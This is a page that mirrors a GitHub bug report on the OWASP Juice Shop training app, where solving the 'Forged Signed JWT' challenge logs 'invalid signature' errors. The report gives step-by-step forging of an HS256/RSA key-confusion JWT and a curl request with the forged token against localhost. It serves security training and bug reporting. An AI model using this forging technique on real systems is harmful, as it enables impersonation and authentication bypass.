Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
[🐛] Solving Forged Signed JWT results in UnauthorizedError: invalid signature
See original GitHub issue🐛 Bug report
Description
When trying to solve the Forged Signed JWT challenge, Juice Shop responds with both an UnauthorizedError: invalid signature and marks the challenge as solved. I do not know if my approach is wrong (and the challenge should not be marked as solved), or if there is a bug showing an error where it shouldn’t.
Is this a regression?
Unknown, I have not tested this with older releases.
🔬 Minimal Reproduction
- Log in as admin to receive a working JWT.
- Copy the JWT to jwt.io and change the email to ‘rsa_lord@juice-sh.op’.
- Switch the algorithm to HS256.
- Paste the the public RSA key as HMAC.
- Send a GET request to
/api/Usersusing the forged JWT:curl -X GET -H "Content-Type: application/json" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6InJzYV9sb3JkQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImxhc3RMb2dpbklwIjoiMC4wLjAuMCIsInByb2ZpbGVJbWFnZSI6ImRlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIwLTAyLTA2IDA4OjI2OjE1LjY1OCArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIwLTAyLTA2IDA4OjI2OjE1LjY1OCArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE1ODA5Nzc2ODcsImV4cCI6MTU4MDk5NTY4N30.D_G5GDBrDpcKn3kZYg-CgBjilAVdqs0INcurxZ1sH9A" http://localhost:3000/api/Users
🔥 Exception or Error
> juice-shop@9.3.1 start C:\Users\Public\dev\juice-shop_9.3.1
> node app
info: All dependencies in ./package.json are satisfied (OK)
info: Detected Node.js version v12.14.1 (OK)
info: Detected OS win32 (OK)
info: Detected CPU x64 (OK)
info: Required file index.html is present (OK)
info: Required file styles.css is present (OK)
info: Required file main-es2015.js is present (OK)
info: Required file tutorial-es2015.js is present (OK)
info: Required file polyfills-es2015.js is present (OK)
info: Required file runtime-es2015.js is present (OK)
info: Required file vendor-es2015.js is present (OK)
info: Required file main-es5.js is present (OK)
info: Required file tutorial-es5.js is present (OK)
info: Required file polyfills-es5.js is present (OK)
info: Required file runtime-es5.js is present (OK)
info: Required file vendor-es5.js is present (OK)
info: Configuration default validated (OK)
info: Port 3000 is available (OK)
info: Server listening on port 3000
info: Solved challenge Score Board (Find the carefully hidden 'Score Board' page.)
info: Solved challenge Password Strength (Log in with the administrator's user credentials without previously changing them or applying SQL Injection.)
info: Solved challenge Login Admin (Log in with the administrator's user account.)
UnauthorizedError: invalid signature
info: Solved challenge Forged Signed JWT (Forge an almost properly RSA-signed JWT token that impersonates the (non-existing) user rsa_lord@juice-sh.op.)
info: Solved challenge Error Handling (Provoke an error that is neither very gracefully nor consistently handled.)
🌳 Your Environment
v12.14.1
6.13.4
Additional Information
I have not identified any relevant additional factors yet.
Issue Analytics
- State:
- Created 4 years ago
- Comments:11 (8 by maintainers)
Top Results From Across the Web
[ 🐛 ] Solving Forged Signed JWT results in UnauthorizedError ...
When trying to solve the Forged Signed JWT challenge, Juice Shop responds with both an UnauthorizedError: invalid signature and marks the challenge as...
Read more >JWT Returns Invalid Signature Error Even When I enter the ...
js JWT always returns an invalid token error in browser response but I couldn't find a solution there. I have attempted to write...
Read more >JWT (JSON Web Tokens) Errors | Invalid JWT Signature
JWTs are signed tokens to authenticate your server to server connections. ... For my error, invalid_grant:Invalid JWT Signature , the way to ...
Read more >bkimminich/juice-shop - Gitter
This first creates a "UnauthorizedError: invalid signature" on the console" but still marks the "Forged Signed JWT" challenge as solved.
Read more >Implementing JWT Authentication in Node.js
If the newly generated signature matches the one on the JWT, then the JWT is considered valid. Now, if you are someone trying...
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
The way I understand this challenge, this is supposed to allow for a key confusion attack. If Juice Shop uses a vulnerable library and does not explicitly specify the algorithm to verify, it will use HMAC as specified in my JWT using the public RSA key to verify the signature. Since the public key can be obtained, it should be possible to create a JWT token that passes signature validation.
IMHO, solving this challenge should allow the attacker to access content using the forged token. So either I made a mistake and really didn’t solve the challenge (then it should not be marked as such), or the forged token is not accepted as originally intended.
Yes, that’s it. I have no clue why, but it seems only Windows is unhackable in that regard… 😂